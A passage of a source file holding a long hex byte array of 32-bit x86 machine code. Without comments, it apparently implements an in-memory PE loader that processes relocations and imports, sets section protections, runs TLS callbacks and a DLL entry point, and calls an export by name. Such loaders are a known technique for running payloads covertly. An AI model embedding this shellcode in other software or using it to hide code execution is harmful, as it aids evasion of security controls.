931 0x85, 0x10, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xd0, 0x89, 0x45, 0xcc, 0x8b,
932 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x4d, 0x84, 0x8b, 0x55, 0x98, 0x01,
933 0xca, 0x01, 0xd0, 0x39, 0x45, 0xcc, 0x73, 0x0e, 0x8b, 0x45, 0xcc, 0x8b,
934 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85, 0xd9, 0xfe, 0xff, 0xff, 0x8b, 0x45,
935 0xa8, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x83, 0x7d,
936 0x84, 0x00, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc,
937 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xdc,
938 0xe9, 0x23, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xdc, 0x8b, 0x50, 0x0c, 0x8b,
939 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x7c, 0xff, 0xff,
940 0xff, 0x8b, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b,
941 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x7a, 0xe1, 0xff, 0xff, 0x89, 0x85,
942 0x78, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xdc, 0x8b, 0x10, 0x8b, 0x85, 0x1c,
943 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xdc, 0x8b,
944 0x50, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45,
945 0xe0, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xc1, 0x00,
946 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x79, 0x2f, 0x8b,
947 0x45, 0xe4, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
948 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x44,
949 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xbe, 0xde, 0xff,
950 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb, 0x7c, 0x8b, 0x45,
951 0xe4, 0x8b, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89,
952 0x85, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85,
953 0xc0, 0x74, 0x2e, 0x8b, 0x85, 0x74, 0xff, 0xff, 0xff, 0x83, 0xc0, 0x02,
954 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x57,
955 0x0b, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80,
956 0xf4, 0x00, 0x00, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb,
957 0x31, 0x8b, 0x85, 0x74, 0xff, 0xff, 0xff, 0x83, 0xc0, 0x02, 0xc7, 0x44,
958 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x85,
959 0x78, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
960 0x04, 0x24, 0xe8, 0x40, 0xde, 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0,
961 0x89, 0x10, 0x83, 0x45, 0xe4, 0x04, 0x83, 0x45, 0xe0, 0x04, 0xe9, 0x32,
962 0xff, 0xff, 0xff, 0x90, 0x83, 0x45, 0xdc, 0x14, 0x8b, 0x45, 0xdc, 0x8b,
963 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xcf, 0xfe, 0xff, 0xff, 0x8b, 0x45,
964 0xa8, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x83, 0x7d,
965 0x84, 0x00, 0x0f, 0x84, 0x1f, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc,
966 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xd8,
967 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x04, 0x8b,
968 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x7c, 0xff, 0xff,
969 0xff, 0x8b, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b,
970 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x1e, 0xe0, 0xff, 0xff, 0x89, 0x85,
971 0x78, 0xff, 0xff, 0xff, 0x83, 0xbd, 0x78, 0xff, 0xff, 0xff, 0x00, 0x0f,
972 0x84, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x10, 0x8b,
973 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45,
974 0xd8, 0x8b, 0x50, 0x0c, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0,
975 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x84,
976 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x79,
977 0x2f, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44,
978 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
979 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x54,
980 0xdd, 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb, 0x44,
981 0x8b, 0x45, 0xe4, 0x8b, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01,
982 0xd0, 0x89, 0x85, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x74, 0xff, 0xff,
983 0xff, 0x83, 0xc0, 0x02, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
984 0x89, 0x44, 0x24, 0x08, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x44,
985 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0e, 0xdd, 0xff,
986 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0x83, 0x45, 0xe4, 0x04,
987 0x83, 0x45, 0xe0, 0x04, 0xe9, 0x6a, 0xff, 0xff, 0xff, 0x90, 0xeb, 0x01,
988 0x90, 0x83, 0x45, 0xd8, 0x20, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x04, 0x85,
989 0xc0, 0x0f, 0x85, 0xf6, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa8, 0x8b, 0x50,
990 0x28, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x70,
991 0xff, 0xff, 0xff, 0x8b, 0x55, 0xa8, 0x8d, 0x85, 0x44, 0xfe, 0xff, 0xff,
992 0x89, 0xd3, 0xba, 0x3e, 0x00, 0x00, 0x00, 0x89, 0xc7, 0x89, 0xde, 0x89,
993 0xd1, 0xf3, 0xa5, 0xc7, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,
994 0x00, 0x0f, 0xb7, 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f, 0xb7, 0xd0, 0x89,
995 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0x85, 0x10,
996 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44,
997 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30,
998 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c,
999 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x3c, 0xff,
1000 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff,
1001 0xff, 0xe8, 0xbe, 0x2b, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90,
1002 0x00, 0x0f, 0x88, 0xfe, 0x08, 0x00, 0x00, 0x0f, 0xb7, 0x85, 0x4a, 0xfe,
1003 0xff, 0xff, 0x0f, 0xb7, 0xd0, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0,
1004 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89,
1005 0x54, 0x24, 0x08, 0x8b, 0x55, 0x8c, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04,
1006 0x24, 0xe8, 0x44, 0x25, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x48,
1007 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x6c, 0x8b, 0x45, 0x08, 0x0f,
1008 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x3f, 0x8b, 0x45,
1009 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54,
1010 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04,
1011 0x24, 0xe8, 0xda, 0x24, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x54,
1012 0x89, 0x44, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00,
1013 0x8b, 0x45, 0xb0, 0x89, 0x04, 0x24, 0xe8, 0xbd, 0x24, 0x00, 0x00, 0xeb,
1014 0x1f, 0x8b, 0x45, 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85, 0x1c, 0xfc, 0xff,
1015 0xff, 0x89, 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0xb0,
1016 0x89, 0x04, 0x24, 0xe8, 0xca, 0x24, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x0f,
1017 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x85, 0xb2, 0x00,
1018 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89,
1019 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff,
1020 0xff, 0xff, 0xe8, 0x34, 0x2a, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d,
1021 0x90, 0x00, 0x0f, 0x88, 0x1c, 0x08, 0x00, 0x00, 0x83, 0x7d, 0x94, 0x00,
1022 0x74, 0x0a, 0xc7, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
1023 0xc7, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85,
1024 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24, 0x28, 0xc7,
1025 0x44, 0x24, 0x24, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00,
1026 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x02, 0x00, 0x00, 0x00, 0x8d,
1027 0x95, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x18, 0xc7, 0x44, 0x24,
1028 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00,
1029 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x1c,
1030 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0xff,
1031 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x91, 0x29, 0x00, 0x00, 0x89,
1032 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x97, 0x07, 0x00, 0x00,
1033 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff,
1034 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x08, 0x00, 0x00,
1035 0x00, 0x8d, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d,
1036 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24,
1037 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd5, 0x29, 0x00, 0x00, 0x89, 0x45, 0x90,
1038 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x54, 0x07, 0x00, 0x00, 0xc7, 0x45,
1039 0xc4, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x88, 0x02, 0x00, 0x00, 0x8b, 0x8d,
1040 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1041 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1042 0x1e, 0x83, 0xe0, 0x01, 0x89, 0x85, 0x50, 0xff, 0xff, 0xff, 0x8b, 0x8d,
1043 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1044 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1045 0x1f, 0x89, 0x85, 0x4c, 0xff, 0xff, 0xff, 0x8b, 0x8d, 0x3c, 0xff, 0xff,
1046 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1,
1047 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8, 0x1d, 0x83, 0xe0,
1048 0x01, 0x89, 0x85, 0x48, 0xff, 0xff, 0xff, 0x83, 0xbd, 0x4c, 0xff, 0xff,
1049 0xff, 0x00, 0x74, 0x15, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff, 0x00, 0x74,
1050 0x0c, 0xc7, 0x45, 0xbc, 0x80, 0x00, 0x00, 0x00, 0xe9, 0xed, 0x00, 0x00,
1051 0x00, 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x74, 0x15, 0x83, 0xbd,
1052 0x48, 0xff, 0xff, 0xff, 0x00, 0x74, 0x0c, 0xc7, 0x45, 0xbc, 0x20, 0x00,
1053 0x00, 0x00, 0xe9, 0xcf, 0x00, 0x00, 0x00, 0x83, 0xbd, 0x50, 0xff, 0xff,
1054 0xff, 0x00, 0x74, 0x38, 0x83, 0xbd, 0x4c, 0xff, 0xff, 0xff, 0x00, 0x74,
1055 0x2f, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff, 0x00, 0x75, 0x26, 0x8b, 0x45,
1056 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x0c,
1057 0xc7, 0x45, 0xbc, 0x08, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00,
1058 0xc7, 0x45, 0xbc, 0x04, 0x00, 0x00, 0x00, 0xe9, 0x8e, 0x00, 0x00, 0x00,
1059 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x1b, 0x83, 0xbd, 0x4c,
1060 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1061 0x00, 0x74, 0x09, 0xc7, 0x45, 0xbc, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x6a,
1062 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x74, 0x1b, 0x83, 0xbd, 0x4c,
1063 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1064 0x00, 0x75, 0x09, 0xc7, 0x45, 0xbc, 0x02, 0x00, 0x00, 0x00, 0xeb, 0x46,
1065 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x1b, 0x83, 0xbd, 0x4c,
1066 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1067 0x00, 0x75, 0x09, 0xc7, 0x45, 0xbc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x22,
1068 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x19, 0x83, 0xbd, 0x4c,
1069 0xff, 0xff, 0xff, 0x00, 0x74, 0x10, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1070 0x00, 0x75, 0x07, 0xc7, 0x45, 0xbc, 0x08, 0x00, 0x00, 0x00, 0x8b, 0x8d,
1071 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1072 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0x25, 0x00,
1073 0x00, 0x00, 0x04, 0x85, 0xc0, 0x74, 0x07, 0x81, 0x4d, 0xbc, 0x00, 0x02,
1074 0x00, 0x00, 0x8b, 0x8d, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x9d, 0x3c, 0xff,
1075 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0,
1076 0xc1, 0xe0, 0x03, 0x01, 0xd8, 0x8b, 0x40, 0x0c, 0x01, 0xc8, 0x89, 0x85,
1077 0x38, 0xfc, 0xff, 0xff, 0x0f, 0xb7, 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f,
1078 0xb7, 0xc0, 0x83, 0xe8, 0x01, 0x39, 0x45, 0xc4, 0x73, 0x43, 0x8b, 0x8d,
1079 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xc4, 0x8d, 0x50, 0x01, 0x89, 0xd0,
1080 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40,
1081 0x0c, 0x89, 0xc3, 0x8b, 0x8d, 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4,
1082 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8,
1083 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x89, 0xd8, 0x29, 0xd0, 0x89, 0x85, 0x34,
1084 0xfc, 0xff, 0xff, 0xeb, 0x1e, 0x8b, 0x8d, 0x3c, 0xff, 0xff, 0xff, 0x8b,
1085 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03,
1086 0x01, 0xc8, 0x8b, 0x40, 0x10, 0x89, 0x85, 0x34, 0xfc, 0xff, 0xff, 0xc7,
1087 0x85, 0x30, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4,
1088 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44,
1089 0x24, 0x10, 0x8b, 0x45, 0xbc, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x85, 0x34,
1090 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x85, 0x38, 0xfc, 0xff,
1091 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
1092 0xe8, 0x45, 0x27, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00,
1093 0x0f, 0x88, 0xc7, 0x04, 0x00, 0x00, 0x83, 0x45, 0xc4, 0x01, 0x0f, 0xb7,
1094 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f, 0xb7, 0xc0, 0x39, 0x45, 0xc4, 0x0f,
1095 0x82, 0x65, 0xfd, 0xff, 0xff, 0xc7, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x00,
1096 0x00, 0x00, 0x00, 0x8b, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89, 0x85, 0x34,
1097 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85,
1098 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c,
1099 0x02, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x34, 0xfc, 0xff, 0xff, 0x89, 0x44,
1100 0x24, 0x08, 0x8d, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04,
1101 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd2, 0x26, 0x00, 0x00,
1102 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x57, 0x04, 0x00,
1103 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
1104 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00,
1105 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x5f, 0x27, 0x00, 0x00,
1106 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x2a, 0x04, 0x00,
1107 0x00, 0x8b, 0x85, 0x04, 0xff, 0xff, 0xff, 0x89, 0x45, 0x84, 0x83, 0x7d,
1108 0x84, 0x00, 0x74, 0x57, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0xc2,
1109 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x85, 0x6c, 0xff, 0xff, 0xff, 0x8b,
1110 0x85, 0x6c, 0xff, 0xff, 0xff, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xd4, 0x83,
1111 0x7d, 0xd4, 0x00, 0x74, 0x32, 0xeb, 0x27, 0x8b, 0x45, 0xd4, 0x8b, 0x00,
1112 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1113 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x14,
1114 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x83, 0x45, 0xd4, 0x04, 0x8b, 0x45,
1115 0xd4, 0x8b, 0x00, 0x85, 0xc0, 0x75, 0xd0, 0x8b, 0x45, 0x0c, 0x8b, 0x00,
1116 0x83, 0xf8, 0x03, 0x0f, 0x85, 0xd9, 0x01, 0x00, 0x00, 0x8b, 0x95, 0x6c,
1117 0xfe, 0xff, 0xff, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89,
1118 0x85, 0x68, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0xc7,
1119 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x01,
1120 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x85, 0x68, 0xff, 0xff, 0xff,
1121 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c,
1122 0x03, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0xbb, 0x02, 0x00, 0x00, 0x8b,
1123 0x85, 0xbc, 0xfe, 0xff, 0xff, 0x89, 0x45, 0x84, 0x8b, 0x85, 0x1c, 0xfc,
1124 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x85, 0x64,
1125 0xff, 0xff, 0xff, 0x83, 0x7d, 0x84, 0x00, 0x0f, 0x84, 0x95, 0x02, 0x00,
1126 0x00, 0x8b, 0x85, 0x64, 0xff, 0xff, 0xff, 0x8b, 0x40, 0x18, 0x89, 0x45,
1127 0xc0, 0x83, 0x7d, 0xc0, 0x00, 0x0f, 0x84, 0x7f, 0x02, 0x00, 0x00, 0x8b,
1128 0x85, 0x64, 0xff, 0xff, 0xff, 0x8b, 0x50, 0x1c, 0x8b, 0x85, 0x1c, 0xfc,
1129 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x60, 0xff, 0xff, 0xff, 0x8b, 0x85,
1130 0x64, 0xff, 0xff, 0xff, 0x8b, 0x50, 0x20, 0x8b, 0x85, 0x1c, 0xfc, 0xff,
1131 0xff, 0x01, 0xd0, 0x89, 0x85, 0x5c, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x64,
1132 0xff, 0xff, 0xff, 0x8b, 0x50, 0x24, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
1133 0x01, 0xd0, 0x89, 0x85, 0x58, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xc0, 0x05,
1134 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
1135 0x85, 0x5c, 0xff, 0xff, 0xff, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x85, 0x1c,
1136 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x54, 0xff, 0xff, 0xff, 0x8b,
1137 0x45, 0x0c, 0x05, 0x0c, 0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b,
1138 0x85, 0x54, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x2b, 0x20, 0x00,
1139 0x00, 0x85, 0xc0, 0x75, 0x37, 0x8b, 0x45, 0xc0, 0x05, 0xff, 0xff, 0xff,
1140 0x7f, 0x8d, 0x14, 0x00, 0x8b, 0x85, 0x58, 0xff, 0xff, 0xff, 0x01, 0xd0,
1141 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
1142 0x00, 0x8b, 0x85, 0x60, 0xff, 0xff, 0xff, 0x01, 0xd0, 0x8b, 0x10, 0x8b,
1143 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xc8, 0xeb, 0x0e,
1144 0x83, 0x6d, 0xc0, 0x01, 0x83, 0x7d, 0xc0, 0x00, 0x0f, 0x85, 0x76, 0xff,
1145 0xff, 0xff, 0x83, 0x7d, 0xc8, 0x00, 0x0f, 0x84, 0xa5, 0x01, 0x00, 0x00,
1146 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0,
1147 0x74, 0x5c, 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85,
1148 0xc0, 0x74, 0x22, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00,
1149 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54,
1150 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x3e, 0xd4, 0xff,
1151 0xff, 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0,
1152 0x74, 0x08, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0xeb, 0x08, 0x8b, 0x45,
1153 0x0c, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xc8,
1154 0xff, 0xd0, 0x83, 0xec, 0x04, 0xe9, 0x3c, 0x01, 0x00, 0x00, 0x8b, 0x45,
1155 0xc8, 0x89, 0x45, 0xb8, 0x8b, 0x45, 0xb8, 0xff, 0xd0, 0xe9, 0x2c, 0x01,
